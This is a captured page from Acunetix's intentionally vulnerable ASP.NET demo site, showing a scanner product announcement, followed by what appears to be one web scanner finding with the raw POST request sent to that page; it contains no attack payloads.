value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1">
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH